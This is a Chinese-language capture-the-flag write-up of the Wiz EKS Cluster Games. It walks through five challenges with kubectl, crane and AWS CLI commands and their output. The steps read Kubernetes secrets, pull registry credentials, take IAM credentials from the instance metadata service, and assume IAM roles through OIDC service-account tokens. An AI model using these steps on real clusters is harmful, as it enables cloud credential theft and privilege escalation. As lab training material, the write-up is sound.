Wiz_EKS_Challenge_WP

链接:https://eksclustergames.com/challenge/1

  • 好玩爱玩

任务一

1
2
3
4
5
6
{
"secrets": [
"get",
"list"
]
}
1
2
3
root@wiz-eks-challenge:~# kubectl get secrets
NAME TYPE DATA AGE
log-rotate Opaque 1 2y166d

尝试读一下 kubectl get secret log-rotate -o yaml

1
2
3
4
5
6
7
8
9
10
11
12
root@wiz-eks-challenge:~# kubectl get secret log-rotate -o yaml
apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b21nX292ZXJfcHJpdmlsZWdlZF9zZWNyZXRfYWNjZXNzfQ==
kind: Secret
metadata:
creationTimestamp: "2023-11-01T13:02:08Z"
name: log-rotate
namespace: challenge1
resourceVersion: "277935903"
uid: 03f6372c-b728-4c5b-ad28-70d5af8d387c
type: Opaque

base64拿到flag - wiz_eks_challenge{omg_over_privileged_secret_access}

任务二

1
2
3
4
5
6
7
8
9
{
"secrets": [
"get"
],
"pods": [
"list",
"get"
]
}

这道题 check the container registries

1
2
root@wiz-eks-challenge:~# kubectl get secrets
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:challenge2:service-account-challenge2" cannot list resource "secrets" in API group "" in the namespace "challenge2"
1
2
3
root@wiz-eks-challenge:~# kubectl get pods   
NAME READY STATUS RESTARTS AGE
database-pod-14f9769b 1/1 Running 6 (28d ago) 245d
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
root@wiz-eks-challenge:~# kubectl get pods database-pod-14f9769b -o yaml
apiVersion: v1
kind: Pod
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2025-08-13T10:48:59Z"
generation: 1
name: database-pod-14f9769b
namespace: challenge2
resourceVersion: "404049975"
uid: e1c6b56d-15d5-491d-9cc8-fa6d739b62c2
spec:
containers:
- image: eksclustergames/base_ext_image
imagePullPolicy: Always
name: my-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-8cw9p
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
imagePullSecrets:
- name: registry-pull-secrets-16ae8e51
nodeName: ip-192-168-6-0.us-west-1.compute.internal
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-8cw9p
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2025-08-13T10:49:05Z"
status: "True"
type: PodReadyToStartContainers
- lastProbeTime: null
lastTransitionTime: "2025-08-13T10:48:59Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2026-03-19T01:02:56Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2026-03-19T01:02:56Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2025-08-13T10:48:59Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://11e6d2869044633eddbb2fcc5771927015d932c6114883bb4f160a21e693d5f5
image: docker.io/eksclustergames/base_ext_image:latest
imageID: docker.io/eksclustergames/base_ext_image@sha256:dc7972c9abff930285186786ba21cdf44a401e91ece2dddd4b487a6028fb3804
lastState:
terminated:
containerID: containerd://61d0da6a4a373824e1b6330c489361b898bb00c5bf04f9b8038364891c963501
exitCode: 0
finishedAt: "2026-03-19T01:02:55Z"
reason: Completed
startedAt: "2026-02-10T18:40:38Z"
name: my-container
ready: true
resources: {}
restartCount: 6
started: true
state:
running:
startedAt: "2026-03-19T01:02:56Z"
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-8cw9p
readOnly: true
recursiveReadOnly: Disabled
hostIP: 192.168.6.0
hostIPs:
- ip: 192.168.6.0
phase: Running
podIP: 192.168.27.229
podIPs:
- ip: 192.168.27.229
qosClass: BestEffort
startTime: "2025-08-13T10:48:59Z"

这里imagePullSecrets:

  • name: registry-pull-secrets-16ae8e51

一般这样的secret会存放关于配置认证相关,可以使pull一些私有仓库,也就是说,我们拿到了secret的名称

间接绕过无法list的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@wiz-eks-challenge:~# kubectl get secret registry-pull-secrets-16ae8e51 -o yaml
apiVersion: v1
data:
.dockerconfigjson: ...
kind: Secret
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2025-08-13T10:48:40Z"
name: registry-pull-secrets-16ae8e51
namespace: challenge2
resourceVersion: "280899175"
uid: c9229447-11c6-40c4-a5a3-ef255ac82306
type: kubernetes.io/dockerconfigjson
  • {“auths”: {“index.docker.io/v1/“: {“auth”: “…”}}}

继续解码,eksclustergames:dckr_pat_…

至此,我们拿到了registryusernamepassword

然后题目暗示环境里面有crane

这是什么呢?echo “dckr_pat_…” | crane auth login index.docker.io/v1/ -u eksclustergames –password-stdin

1
2
root@wiz-eks-challenge:~# echo "dckr_pat_..." | crane auth login index.docker.io -u eksclustergames --password-stdin
2026/04/16 10:36:09 logged in via /home/user/.docker/config.json

但是好像无法list我们这个用户的镜像,所以回到之前的yaml

1
2
image: docker.io/eksclustergames/base_ext_image:latest
imageID: docker.io/eksclustergames/base_ext_image@sha256:a17a9428af1cc25f2158dfba0fe3662cad25b7627b09bf24a915a70831d82623

base_ext_image:latest

去查找相关讯息

1
2
3
root@wiz-eks-challenge:~# crane config eksclustergames/base_ext_image:latest
{"architecture":"amd64","config":{"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sleep","3133337"],"ArgsEscaped":true},"created":"2025-08-13T14:12:01.893680673+03:00","history":[{"created":"2024-09-26T21:31:42Z","created_by":"BusyBox 1.37.0 (glibc), Debian 12"},{"created":"2025-08-13T14:12:01.893680673+03:00","created_by":"RUN sh -c echo 'wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}' \u003e /flag.txt # buildkit","comment":"buildkit.dockerfile.v0"},{"created":"2025-08-13T14:12:01.893680673+03:00","created_by":"CMD [\"/bin/sleep\" \"3133337\"]","comment":"buildkit.dockerfile.v0","empty_layer":true}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:65014c70e84b6817fac42bb201ec5c1ea460a8da246cac0e481f5c9a9491eac0","sha256:f6d5df3e8d8c94ade34d5100efa0b1521a481a4b12d4a4c0bcb4eb92013710a1"]}}root@wiz-eks-challenge:~# crane ls eksclustergames/base_ext_image
latest

拿到wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}

任务三:Image Inquisition

1
2
3
4
5
A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.

Remember: You are running inside a compromised EKS pod.

For your convenience, the crane utility is already pre-installed on the machine.
1
2
3
4
5
6
{
"pods": [
"list",
"get"
]
}

可以查看一个pod

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
root@wiz-eks-challenge:~# kubectl get pod accounting-pod-acbd5209 -o yaml
apiVersion: v1
kind: Pod
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2025-08-13T11:22:21Z"
generation: 1
name: accounting-pod-acbd5209
namespace: challenge3
resourceVersion: "404063026"
uid: ff755d4c-5581-4673-8e2f-5bd999882d5d
spec:
containers:
- image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4
imagePullPolicy: IfNotPresent
name: accounting-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-n7q8h
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: ip-192-168-63-122.us-west-1.compute.internal
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-n7q8h
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2025-08-13T11:22:22Z"
status: "True"
type: PodReadyToStartContainers
- lastProbeTime: null
lastTransitionTime: "2025-08-13T11:22:21Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2026-03-19T01:36:10Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2026-03-19T01:36:10Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2025-08-13T11:22:21Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://381e80b40a78de9329e855b79082b90007f327771a915cdd38688682e513f601
image: sha256:c5e09ea1551a1976284b15c1d5e856cbda91b98e04a7e88f517a182f29b0c914
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4
lastState:
terminated:
containerID: containerd://7e841671e1a9e9613f18070cd76408e69adff039713f2e9bcf834f413abdb3f2
exitCode: 0
finishedAt: "2026-03-19T01:36:08Z"
reason: Completed
startedAt: "2026-02-10T19:13:51Z"
name: accounting-container
ready: true
resources: {}
restartCount: 6
started: true
state:
running:
startedAt: "2026-03-19T01:36:09Z"
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-n7q8h
readOnly: true
recursiveReadOnly: Disabled
hostIP: 192.168.63.122
hostIPs:
- ip: 192.168.63.122
phase: Running
podIP: 192.168.38.4
podIPs:
- ip: 192.168.38.4
qosClass: BestEffort
startTime: "2025-08-13T11:22:21Z"

这里看到第一个hint Try contacting the IMDS to get the ECR credentials.

这里,我问了一下ai,什么是IMDS Instance Metadata Service(实例元数据服务)的缩写

1
2
3
4
5
6
7
8
9
10
11
12
13
它是一个特殊的内部服务,运行在每一个 EC2 实例(包括 EKS 节点)的链路本地地址 169.254.169.254 上。实例上的应用程序可以通过访问这个服务来获取关于自身实例的元数据,例如:

实例 ID、私有 IP、主机名

IAM 角色名称及临时凭证(AccessKey, SecretKey, Token)

用户自定义数据(User Data)

网络配置、安全组等

与 ECR credentials 的关系

当你在 EKS 节点上(或任何 EC2 实例上)需要拉取 Amazon ECR(Elastic Container Registry)私有镜像时,无需硬编码用户名密码。ECR 的认证机制是基于 AWS IAM 的。

好像是老家伙了,之前SSRF获取令牌就是打的这个

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

在yaml里面我们也可以看到容器的pull地址为688655246681.dkr.ecr.us-west-1.amazonaws.com 现在我们仿造上一题,上一题是读secret去直接拿到凭证,这里我们要借助元数据(理解为本地肯定能找到凭证,而ECR依赖IAM) , 既然在EKS环境,而EKS又在AWS云上,元数据就很好读了

1
2
3
4
5
6
7
8
9
10
root@wiz-eks-challenge:~# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 511 100 511 0 0 3494 0 --:--:-- --:--:-- --:--:-- 3500
{
"AccessKeyId": "...",
"Expiration": "2026-04-16 11:54:39+00:00",
"SecretAccessKey": "...",
"SessionToken": "..."
}

这里注意一下,元数据地址都是固定的

这里通过awscil获取到爬取镜像的凭证

1
root@wiz-eks-challenge:~# aws ecr get-login-password|crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin
1
2
3
4
root@wiz-eks-challenge:~# crane ls 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7
ec47783c-container
root@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7:ec47783c-container
{"architecture":"amd64","config":{"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sleep","3133337"],"ArgsEscaped":true},"created":"2025-08-13T11:22:17.044629915Z","history":[{"created":"2024-09-26T21:31:42Z","created_by":"BusyBox 1.37.0 (glibc), Debian 12"},{"created":"2025-08-13T11:22:17.044629915Z","created_by":"RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit","comment":"buildkit.dockerfile.v0"},{"created":"2025-08-13T11:22:17.044629915Z","created_by":"CMD [\"/bin/sleep\" \"3133337\"]","comment":"buildkit.dockerfile.v0","empty_layer":true}],"moby.buildkit.cache.v0":"W3siZGlnZXN0Ijoic2hhMjU2OjBhMDNhMjBmMDY1M2I5MDVkMDA3ZmZmMDUzZGRiZjAyNGRiMTY0ODAwMTdhODU0ZmE5Y2I0ZDYxOTI0NTc4NzEifSx7ImxheWVycyI6W3sibGF5ZXIiOjEsImNyZWF0ZWRBdCI6IjIwMjUtMDgtMTNUMTE6MjI6MTcuMDUxMDE2NzE1WiJ9XSwiZGlnZXN0Ijoic2hhMjU2OjM4YjAzMDUxMjRlYTk4YjQ0YmJmOWU2YWYyYTY0YjM5Y2UyZjQ0NTRkZWRjMWY4MWM3ZWU1OTBiZDk3NjVlZTgiLCJpbnB1dHMiOltbeyJzZWxlY3RvciI6InNoYTI1Njo4YTVlZGFiMjgyNjMyNDQzMjE5ZTA1MWU0YWRlMmQxZDViYmM2NzFjNzgxMDUxYmYxNDM3ODk3Y2JkZmVhMGYxIiwibGluayI6MH0seyJzZWxlY3RvciI6InNoYTI1Njo4YTVlZGFiMjgyNjMyNDQzMjE5ZTA1MWU0YWRlMmQxZDViYmM2NzFjNzgxMDUxYmYxNDM3ODk3Y2JkZmVhMGYxIiwibGluayI6Mn1dXX0seyJkaWdlc3QiOiJzaGEyNTY6NzBkODBkMzI0NGE4ZGQ1NTEwNDMzYTk0ZGQxZWZhYzhkMjAzMjY2MjJlYTJmMTM3YThkMGY4MTM4MGU2MWRjYiJ9XQ==","os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:65014c70e84b6817fac42bb201ec5c1ea460a8da246cac0e481f5c9a9491eac0","sha256:049623e0f38ab81266b63bcf3825d96932b7752d1ca32a4c035b73a537dcaa1b"]}}

拿到flag

1
wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future}

任务三:Pod Break

You’re inside a vulnerable pod on an EKS cluster. Your pod’s service-account has no permissions. Can you navigate your way to access the EKS Node’s privileged service-account?

Please be aware: Due to security considerations aimed at safeguarding the CTF infrastructure, the node has restricted permissions

EKS(Amazon Elastic Kubernetes Service) 是 AWS 提供的 托管 Kubernetes 服务

现在自由度是越来越高了,没有Permissions, 已经在EKS集群内的pod内了,并且所在的pod的服务账户没有权限,要我接管EKS

也可以说是容器逃逸了

只能试试 aws sts get-caller-identity 了

1
2
3
4
5
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0bd90a7fe60cdb9f7",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7"
}

现在其实就是利用可行的云服务命令实现越权了

这里也是一个典型的低权限pod-account可以通过云服务去越权了

1
aws eks get-token --cluster-name eks-challenge-cluster > eks-token.json

这里拿到token之后就可以登录新的kubectl了

这里集群的名称是

1
eks-challenge-cluster
1
2
3
4
5
6
7
8
9
10
11
12
root@wiz-eks-challenge:~# ls
eks-token.json
root@wiz-eks-challenge:~# cat *
{
"kind": "ExecCredential",
"apiVersion": "client.authentication.k8s.io/v1beta1",
"spec": {},
"status": {
"expirationTimestamp": "2026-04-16T11:34:33Z",
"token": "..."
}
}

现在就是拿这个token去使用kubectl去操控集群了

1
kubectl auth can-i --list --token="..."
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
kubectl auth can-i --list --token="..."
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]

kubectl auth can-i –list –token 标记这个命令,可以列举这个账户下的权限

1
2
3
root@wiz-eks-challenge:~# kubectl get secret --token="..."
NAME TYPE DATA AGE
node-flag Opaque 1 2y166d
1
2
3
4
5
6
7
8
9
10
11
apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
kind: Secret
metadata:
creationTimestamp: "2023-11-01T12:27:57Z"
name: node-flag
namespace: challenge4
resourceVersion: "277935898"
uid: 26461a29-ec72-40e1-adc7-99128ce664f7
type: Opaque

拿下!wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}

任务五:Container Secrets Infrastructure

之前碰到卡壳的地方直接看wp了,最后一关留个圆满吧

You’ve successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?

也是很清晰易懂,现在就是aws服务(IAM)越权了

来了一些权限审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
{
"Policy": {
"Statement": [
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]
}
],
"Version": "2012-10-17"
}
}

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
}
]
}//存在一个 IAM 角色,其信任策略允许来自该 EKS 集群的任意 Service Account 扮演它。

{
"secrets": [
"get",
"list"
],
"serviceaccounts": [
"get",
"list"
],
"pods": [
"get",
"list"
],
"serviceaccounts/token": [
"create"
]
}

1
2
3
root@wiz-eks-challenge:~# aws s3 ls s3://challenge-flag-bucket-3ff1ae2

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: User: arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7 is not authorized to perform: s3:ListBucket on resource: "arn:aws:s3:::challenge-flag-bucket-3ff1ae2" because no identity-based policy allows the s3:ListBucket action

现在应该就是利用集群的权限去通过这个权限了

审计这个权限

1
2
3
存在一个 IAM 角色,其信任策略允许来自该 EKS 集群的任意 Service Account 扮演它。
如果你能获取到该集群内任意一个 Service Account 的 JWT token(例如你当前 Pod 的 service account token,或者通过读取 secrets 获取其他 SA 的 token),你就可以扮演这个 IAM 角色,获得该角色的 AWS 权限。
该角色可能拥有较高的权限(比如可以操作 EKS、EC2、S3 等),成为你提权的关键一步。
1
2
3
4
5
6
7
8
9
10
root@wiz-eks-challenge:~# kubectl auth can-i  --list --token="..."
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]

可以为debug-so这个仅有的创造token

1
...

这里创造出来的jwttoken具有有 OIDC权限 ,理论上就是ok的了

1

但是注意,生成时还需要加上--audience sts.amazonaws.com
最后一步是

1
2
3
4
aws sts assume-role-with-web-identity \
--role-arn "11asdsadsadsadsadsadsadas11" \
--role-session-name "ctf-session" \
--web-identity-token "..."

但是我们要拿到ROLE_ARN

回去可以看到

1
2
3
4
5
6
7
8
9
10
11
12
kubectl get serviceaccount debug-sa -n challenge5 -o yaml --token="..."
apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
description: This is a dummy service account with empty policy attached
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
creationTimestamp: "2023-10-31T20:07:37Z"
name: debug-sa
namespace: challenge5
resourceVersion: "671929"
uid: 6cb6024a-c4da-47a9-9050-59c8c7079904

所以重复,拿到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity \
> --role-arn "arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e" \
> --role-session-name "Sh_eePppp" \
> --web-identity-token "..."
{
"Credentials": {
"AccessKeyId": "...",
"SecretAccessKey": "...",
"SessionToken": "...",
"Expiration": "2026-04-16T13:01:41+00:00"
},
"SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
"AssumedRoleUser": {
"AssumedRoleId": "AROA2AVYNEVM6G5PAIL7U:Sh_eePppp",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeTestRole-fc9d18e/Sh_eePppp"
},
"Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"Audience": "sts.amazonaws.com"
}

然后一直权限不对吗,还是challengeTestRole-fc9d18e的问题,确实可以扮演进去,但是访问不了s3

所以还是要回到kubectl

1
2
3
4
5
kubectl get serviceaccount  --token="..."
NAME SECRETS AGE
debug-sa 0 2y167d
default 0 2y167d
s3access-sa 0 2y167d

有list不先list,我太蠢了

1
arn:aws:iam::688655246681:role/challengeEksS3Role

这里还是用dubug-sa创建jwt token

1
2
3
4
aws sts assume-role-with-web-identity \
--role-arn "arn:aws:iam::688655246681:role/challengeEksS3Role" \
--role-session-name "sheep" \
--web-identity-token "..."

这里只能看到s3access-sa的role,无法create它的token()注意了

这里其实还是信息搜集没有做好,加之对iam了解还是不够全面

1
2
3
4
5
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag ./flag
download: s3://challenge-flag-bucket-3ff1ae2/flag to ./flag
Killed
root@wiz-eks-challenge:~# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}

后面也要复习下这些命令,权限管理占云安全的很大比重

这个靶场难度不够,但是层层递进,很适合云安全入门

结语

结束了,连续打了两个多h ,休息啦

https://eksclustergames.com/finisher/n0Osa6BR